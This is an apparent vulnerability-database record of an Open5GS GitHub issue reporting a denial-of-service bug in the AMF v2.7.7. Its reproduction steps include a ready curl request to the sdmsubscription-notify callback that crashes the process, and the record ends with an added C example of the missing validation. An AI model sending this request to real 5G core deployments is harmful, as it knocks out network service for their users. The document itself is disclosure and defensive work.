| Title | Open5GS AMF v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AMF crashes when it receives
`POST /namf-callback/v1/{anything}/sdmsubscription-notify`
with a `ModificationNotification` whose `changeItem` omits `newValue`.
The `ChangeItem` parser accepts a missing `newValue`, but
`amf_namf_callback_handle_sdm_data_change_notify()` later calls
`update_ambr()`, which unconditionally dereferences `item_change->new_value->json`.
This makes the callback route remotely crashable with a single HTTP request.
### Steps to reproduce
1. Start the official Open5GS v2.7.7 Docker deployment.
2. Register a real UE so that the callback can reference a valid SUPI. In my
live setup I used the existing MongoDB subscriber:
```text
IMSI: 001011234567891
K: 00000000000000000000000000000000
OPC: 00000000000000000000000000000000
AMF: 8000
DNN: internet
S-NSSAI: SST=1, SD=1
```
3. Bring up a UERANSIM gNB and UE on the same Docker network and wait until the
UE is fully registered. In my live setup the AMF log showed:
```text
[imsi-001011234567891] Registration complete
```
4. Send the following HTTP/2 callback request to the AMF SBI endpoint
(`http://10.33.33.9:80` in my live setup):
```bash
curl --http2-prior-knowledge -m 5 -sS -i \
-X POST http://10.33.33.9/namf-callback/v1/x/sdmsubscription-notify \
-H 'content-type: application/json' \
--data '{"notifyItems":[{"resourceId":"imsi-001011234567891/am-data","changes":[{"op":"REMOVE","path":"/foo"}]}]}'
```
5. Check the AMF container state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 80 amf
```
### Logs
```text
04/10 15:51:47.137: [gmm] INFO: [imsi-001011234567891] Registration complete
/usr/local/bin/entrypoint.sh: line 10: 8 Segmentation fault (core dumped) open5gs-amfd "${@}"
```
### Expected behaviour
AMF should reject the malformed callback with a normal HTTP error such as
`400 Bad Request`, and the AMF process should remain running.
### Observed Behaviour
The HTTP/2 stream terminates abnormally, no proper error response is returned,
and the AMF process exits with code `139` due to a segmentation fault.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM UE v3.2.7
|
|---|
| Source | https://github.com/open5gs/open5gs/issues/4395 |
|---|
| User | ZiyuLin (UID 93568) |
|---|
| Submission | 2026-04-14 04:01 (2 months ago) |
|---|
| Moderation | 2026-04-30 18:26 (17 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 360332 [Open5GS up to 2.7.7 AMF SBI Endpoint sdmsubscription-notify amf_namf_callback_handle_sdm_data_change_notify changeItem.newValue denial of service] |
|---|
| Points | 20 |
|---|
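
The missing check described in the report, as an added example that is not Open5GS code and not from the submitter: every change item is validated before any consumer reads `new_value->json`, and a missing `newValue` yields `400` instead of a NULL dereference. The type names, `handle_changes()` and `apply_new_value()` are hypothetical stand-ins for the parsed `ChangeItem` and the `update_ambr()` consumer.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-ins for the parsed SBI types; not Open5GS definitions. */
typedef struct { const char *json; } any_type_t;
typedef struct {
    const char *op;         /* e.g. "REPLACE", "REMOVE" */
    const char *path;
    any_type_t *new_value;  /* NULL when the JSON body omitted "newValue" */
} change_item_t;

enum { HTTP_NO_CONTENT = 204, HTTP_BAD_REQUEST = 400 };

/* Stand-in for a consumer that, like update_ambr(), reads new_value->json. */
static size_t apply_new_value(const any_type_t *v) { return strlen(v->json); }

/* Pass 1 validates every item, pass 2 applies them, so a malformed item
 * can neither crash the process nor leave a half-applied notification.
 * Returns the HTTP status the callback should answer with. */
int handle_changes(const change_item_t *items, size_t n, size_t *applied)
{
    size_t i;

    *applied = 0;
    for (i = 0; i < n; i++) {
        const change_item_t *c = &items[i];
        if (!c->op || !c->path)
            return HTTP_BAD_REQUEST;
        /* The case from the report: a change item without newValue. */
        if (!c->new_value || !c->new_value->json)
            return HTTP_BAD_REQUEST;
    }
    for (i = 0; i < n; i++)
        *applied += apply_new_value(items[i].new_value);
    return HTTP_NO_CONTENT;
}

int main(void)
{
    /* Constructed sample mirroring the change item in the request above. */
    change_item_t bad = { "REMOVE", "/foo", NULL };
    size_t applied;

    return handle_changes(&bad, 1, &applied) == HTTP_BAD_REQUEST ? 0 : 1;
}
```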